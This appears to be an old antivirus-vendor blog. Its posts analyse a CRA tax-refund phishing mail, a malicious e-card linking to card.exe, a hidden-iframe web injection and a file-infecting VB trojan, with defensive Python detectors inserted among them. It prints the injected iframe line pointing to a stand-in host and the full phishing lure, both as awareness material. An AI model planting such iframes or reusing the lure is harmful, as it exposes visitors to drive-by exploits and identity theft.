Saturday, March 14, 2009

How to redirect a 404 error page

Usually when you type a wrong address for a website, you get a so-called 404 page. 404 is actually the status code the web server returns when the requested page was not found. If you are a web developer or the administrator of a domain, you may want to send those users to the main page (let's say index.html) instead.
All you have to do is add this rule to your .htaccess file:

ErrorDocument 404 /index.html

Note that the target is a local path, so Apache serves index.html while still answering with the 404 status; if you give a full URL instead, Apache answers with a redirect and the client never sees the 404.

Enjoy :)

Friday, March 13, 2009

Money from Canadian Revenue Agency

I think I'm lucky this year. I just received an e-mail from the Canada Revenue Agency telling me that I'm eligible for a tax refund of 386.00.
Cool!!! .. but hey, I don't live in Canada, what is going on?
The e-mail looks OK, as you can see below:

Canada Revenue Agency
Online Refund Form

After the last annual calculation of your fiscal activity we have determined that you are eligible to receive a tax refund of 386.00.

Please submit the tax refund and allow us 3-9 days in order to process it.

A refund can be delayed for a variety of reasons. For example submitting invalid records or applying after the deadline.

To access the form for your tax refund, please click here

Copyright Canada Revenue Agency. All rights reserved. www.cra-arc.gc.ca

As you can see in the screenshot, the website looks like the real one, www.cra-arc.gc.ca.

Now, the fake website for the online refund form is in Taiwan and last time I looked, Taiwan wasn't a part of Canada.

If we start analyzing it, we can see that this is just another case of identity theft: the form asks for the following elements: Social Insurance Number, DOB (date of birth), and full name.

So, unfortunately it's just spam, it was too good to be true, maybe next time..

Happy greetings e-card is waiting for you

The anatomy of a greeting:

I just opened the mail in the morning and saw an interesting message in the junk folder.
It appears that someone sent me an e-card; too bad it's not my birthday.
The mail looks like this:

Carol has sent an e-card.
Your Greeting card will be available at:
hxxp://greetingcardcalendar.com/ID=?-XXXXX..X-
This card was sent from 123greetings.com!

At first glance this may look valid to anyone. 123greetings.com is a legitimate website with some lovely e-cards.
Now the question that arises is: why isn't the link from 123greetings.com?
So, we downloaded the webpage and had such a "BIG" surprise: it has a link to a "card.exe". Now that's funny.
How many clean .exe e-cards from 123greetings have you seen? The correct answer is NONE.

Fortunately, the "card.exe" (MD5:88dfdfa6ba077c18df753f279a51258d) is already detected by us and several antivirus scanners:
Email-Worm.Win32.Iksmas.by (Kaspersky), W32/Waledac.gen.a (McAfee), Trojan:Win32/Waledac.B (Microsoft)

So, the lesson from this e-mail is that even if a message appears to come from a legitimate website, always check where the link actually points.
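The "check where the link points" rule from this post and the CRA refund mail above, as an added example that is not part of the original blog: it pulls every link out of a message body, compares the link host with the domain the message claims to come from (a suffix match, so a lookalike host that merely contains the real name still fails), and flags links to Windows executables. The two message bodies are constructed from the quoted mails; the CRA host is a placeholder under the reserved .invalid TLD.

```python
import re
from urllib.parse import urlparse

# Match http(s) links, including the defanged "hxxp" form used when quoting malicious mail.
URL_RE = re.compile(r"\bh(?:tt|xx)ps?://[^\s<>\"')]+", re.IGNORECASE)
EXEC_EXT = (".exe", ".scr", ".pif", ".com", ".bat")

def under_domain(host, domain):
    """True only if host is the domain itself or a real subdomain of it
    (a plain substring test would be fooled by cra-arc.gc.ca.refund-form.invalid)."""
    host, domain = host.lower(), domain.lower()
    return host == domain or host.endswith("." + domain)

def check_links(body, claimed_domain):
    """Return (url, reasons) for each link in body that is not under the domain the
    message claims to come from, or that points at a Windows executable."""
    findings = []
    for raw in URL_RE.findall(body):
        url = re.sub(r"^hxxp", "http", raw, flags=re.IGNORECASE)   # un-defang
        parsed = urlparse(url)
        host = parsed.hostname or ""
        reasons = []
        if not under_domain(host, claimed_domain):
            reasons.append(f"host {host!r} is not under {claimed_domain}")
        if parsed.path.lower().endswith(EXEC_EXT):
            reasons.append("points at an executable")
        if reasons:
            findings.append((url, reasons))
    return findings

# Constructed messages modelled on the two mails quoted in the posts (placeholder hosts).
CRA_MAIL = """Canada Revenue Agency - Online Refund Form
To access the form for your tax refund, please click here:
http://www.cra-arc.gc.ca.refund-form.invalid/online/index.php
Copyright Canada Revenue Agency. All rights reserved. www.cra-arc.gc.ca"""

ECARD_MAIL = """Carol has sent an e-card.
Your Greeting card will be available at:
hxxp://greetingcardcalendar.com/ID=XXXXX
(the landing page in turn offers hxxp://greetingcardcalendar.com/card.exe)
This card was sent from 123greetings.com!"""

if __name__ == "__main__":
    for name, body, domain in (("CRA", CRA_MAIL, "cra-arc.gc.ca"),
                               ("e-card", ECARD_MAIL, "123greetings.com")):
        for url, reasons in check_links(body, domain):
            print(f"[{name}] {url}: {'; '.join(reasons)}")
```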

Enjoy :)

MD5 database for Vista

Here you can find a database with MD5 sums for the files found in %systemdir% on Vista.

How to create a native application in C

First, read this article. You will only need the Windows DDK (Driver Development Kit).
After that, you need to create two files in your working directory:
makefile
!INCLUDE $(NTMAKEENV)\makefile.def

and
sources
TARGETNAME=myprog
TARGETPATH=OBJ
TARGETTYPE=PROGRAM
# build for the native subsystem instead of a Win32 console application
UMTYPE=nt
SOURCES=myprog.c

Now create your myprog.c file and don't forget to use only Native APIs (the functions exported by ntdll.dll). When you're done, open the checked or free build environment command prompt of the DDK, go to your working folder and type the following command:

build

If everything was OK, you should have a new folder (like objchk_wxp_x86, objfree_wxp_x86, etc.) with an .exe in it. Keep in mind that you can't run it like a normal Windows application!
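A check for the build output, as an added example that is not part of the original post: a native application is a PE image whose Subsystem field is IMAGE_SUBSYSTEM_NATIVE (1) rather than WINDOWS_GUI (2) or WINDOWS_CUI (3), which is why the Win32 loader refuses to start it like a normal program. The parser below reads that field from any PE32/PE32+ file; the header it is tested against is a constructed minimal PE, not a real binary.

```python
import struct
import sys

# IMAGE_SUBSYSTEM_* values from the PE specification
SUBSYSTEMS = {1: "NATIVE", 2: "WINDOWS_GUI", 3: "WINDOWS_CUI"}

def pe_subsystem(data):
    """Return the Subsystem field of a PE image, or None if data is not a PE file."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    opt = e_lfanew + 4 + 20          # skip the PE signature and the 20-byte COFF header
    if len(data) < opt + 70:
        return None
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):  # PE32 / PE32+
        return None
    # Subsystem sits at offset 68 of the optional header in both PE32 and PE32+
    return struct.unpack_from("<H", data, opt + 68)[0]

def is_native_image(data):
    """True when the image targets the native subsystem (runs on top of ntdll only)."""
    return pe_subsystem(data) == 1

def build_sample_pe(subsystem):
    """Constructed minimal PE header (not a runnable binary) to exercise the parser."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                        # e_lfanew
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)                                           # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<H", opt, 68, subsystem)
    return bytes(dos) + coff + bytes(opt)

if __name__ == "__main__":
    # usage: python pe_subsystem.py objchk_wxp_x86\i386\myprog.exe
    with open(sys.argv[1], "rb") as f:
        sub = pe_subsystem(f.read())
    print(sys.argv[1], "subsystem:", SUBSYSTEMS.get(sub, sub))
```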

Enjoy :)

Trojan.Iframe

- What it is, what it does


[Description]

You can find it almost anywhere; it is small and can hardly be seen :)
You can encounter it even on websites that are supposed to be clean, because malicious people use all kinds of exploits for known platforms in order to append a small piece of code to a certain web page.
To understand it better, let me show you how it appears:

<iframe src='http://IP/path/index.php' width='1' height='1' style='visibility: hidden'></iframe>

(other variants are the same; there are different attributes, sources, etc., but they have the same behaviour)

As you can see, it isn't something extraordinary, just one line of code.. but let's see what it does.

First it creates an invisible frame that points to a certain website. Usually that website is a fake one, or a real one that was hacked.
The content received from that IP is malicious. It can be an exploit, for example a specially crafted image that, when rendered, triggers a buffer overflow so that arbitrary code is executed. This has the potential to take over the entire machine and add it to a very large botnet.
A botnet is a network of zombie computers whose purpose is to serve a malicious person. They can send spam, attack other computers causing a Denial of Service, etc...
It can also install a keylogger in order to gather passwords, credit card numbers and other confidential information.
The attackers' primary purpose is to make money, so they will continue to do this and a lot more in order to ensure that.

Now, as you can see, with just one line of code someone can have access to your entire system. It could even be monitoring your activity right now...
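A detector for the injected tag described above, as an added example that is not part of the original post: it parses a page and reports every iframe that is sized 1 pixel or smaller, or hidden through its style attribute, together with where it points. The sample page is constructed; its injected hosts are documentation addresses, not real indicators.

```python
import re
from html.parser import HTMLParser

class HiddenIframeFinder(HTMLParser):
    """Collects <iframe> tags that are sized or styled so the user never sees them."""

    def __init__(self):
        super().__init__()
        self.hits = []   # (src, reasons)

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":                      # HTMLParser lowercases tag names
            return
        a = {k: (v or "") for k, v in attrs}     # attribute names are lowercased too
        reasons = []
        for dim in ("width", "height"):
            m = re.match(r"\s*(\d+)", a.get(dim, ""))
            if m and int(m.group(1)) <= 1:
                reasons.append(f"{dim}={m.group(1)}")
        style = re.sub(r"\s+", "", a.get("style", "")).lower()
        if "visibility:hidden" in style or "display:none" in style:
            reasons.append("hidden by style")
        if reasons:
            self.hits.append((a.get("src", ""), reasons))

def find_hidden_iframes(html):
    """Return (src, reasons) for every invisible iframe in the document."""
    finder = HiddenIframeFinder()
    finder.feed(html)
    finder.close()
    return finder.hits

# Constructed page: one legitimate embed plus two injected variants (placeholder hosts).
SAMPLE_PAGE = """<html><body>
<h1>Welcome</h1>
<iframe src="https://example.com/video" width="640" height="360"></iframe>
<iframe src='http://198.51.100.7/path/index.php' width='1' height='1' style='visibility: hidden'></iframe>
<IFRAME SRC="http://203.0.113.9/x.php" STYLE="display: none"></IFRAME>
</body></html>"""

if __name__ == "__main__":
    for src, reasons in find_hidden_iframes(SAMPLE_PAGE):
        print(src, "->", ", ".join(reasons))
```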


[Clean]

What can you do in order to prevent this.. hmm.. not much. If you are a regular user who doesn't want to do complicated things, then you can just have an antivirus installed and keep your computer updated.

If you are a person who cares very much about security, then you can add a few more layers of protection; for example, you can browse the internet from inside a virtual machine (VMware, VirtualPC, etc..).

Usually, if you have a good antivirus installed and updated, you can say that you are protected, but still don't visit malicious websites :)

Still, if the antivirus warns you about it, then usually all you have to do is delete the infected file (this can be achieved by deleting the temporary internet files, or the cache, depending on your browser).

Trojan.VB.28672

(aka Win-Trojan/Landa.28672, Trojan.VB.AE, Worm/VB.JZ, W32/Backdoor.IBK, Trj/Riwomuz.A, Trojan.Fasiat )


[Description]

The trojan aims to appear as a valid picture, movie or application.
This is its spreading method: it searches for media files or applications and copies itself next to them with a similar name.
When it is run, it shows a message box with one of several fake error messages (screenshots in the original post).

After that it starts to search all folders for media files (avi, jpg and mp3 extensions).
If it finds a media file, it copies itself into the same folder, borrowing the same name
but adding the .exe extension (e.g. picture1.jpg.exe).
It also searches for application files (exe extension).
If it finds an exe file, it copies itself into the same folder but adds a random letter
in front of the name.
It also checks the size of every file and, if it is 28,672 bytes, it will not infect it. It does that
in order to avoid creating a copy of a file that is already infected.
You can easily check if the virus is active by opening Task Manager and looking for an "L_and_A"
application (screenshot in the original post).

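A file system sweep for the copy pattern described above, as an added example that is not part of the original post or its removal tool: it flags .exe files that reuse a neighbouring media file's name with .exe appended, .exe files that are a neighbouring .exe with one extra leading character, and files of exactly 28,672 bytes (the size check alone is only a weak hint). The directory tree it runs on is constructed from zero-filled files.

```python
import os
import tempfile
from pathlib import Path

INFECTED_SIZE = 28672                 # size of the trojan body, per the write-up
MEDIA_EXT = {".avi", ".jpg", ".mp3"}  # extensions it looks for

def suspicious_copies(root):
    """Return (relative path, reasons) for .exe files matching the copy pattern."""
    hits = []
    for dirpath, _, names in os.walk(root):
        exes = {n for n in names if n.lower().endswith(".exe")}
        for name in sorted(exes):
            path = Path(dirpath) / name
            stem = name[:-4]                         # drop ".exe"
            reasons = []
            # picture1.jpg.exe dropped beside picture1.jpg
            if Path(stem).suffix.lower() in MEDIA_EXT and stem in names:
                reasons.append("media file name with .exe appended")
            # xprog.exe dropped beside prog.exe: one extra leading character
            if name[1:] in exes:
                reasons.append(f"one-letter prefix of {name[1:]}")
            if path.stat().st_size == INFECTED_SIZE:   # weak indicator on its own
                reasons.append("size is 28,672 bytes")
            if reasons:
                hits.append((path.relative_to(root).as_posix(), reasons))
    return hits

def build_sample(root):
    """Constructed tree (zero-filled files, not real malware) mimicking an infection."""
    layout = {
        "photos/picture1.jpg": 4096,
        "photos/picture1.jpg.exe": INFECTED_SIZE,
        "apps/prog.exe": 1000,
        "apps/xprog.exe": INFECTED_SIZE,
        "music/song.mp3": 2048,
    }
    for rel, size in layout.items():
        p = Path(root) / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(b"\0" * size)

def demo():
    with tempfile.TemporaryDirectory() as root:
        build_sample(root)
        return suspicious_copies(root)

if __name__ == "__main__":
    for rel, reasons in demo():
        print(rel, "->", "; ".join(reasons))
```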
[Clean]

Download our removal tool (Trojan.VB.28672-removaltool.zip) and restart the system in safe mode.
Extract the contents of the zip file to a folder. After that, go to the folder where you extracted
the contents of the archive and double-click the removaltool application. An easy-to-use graphical
interface will appear. Check the "Scan and clean" option and press the "Scan" button.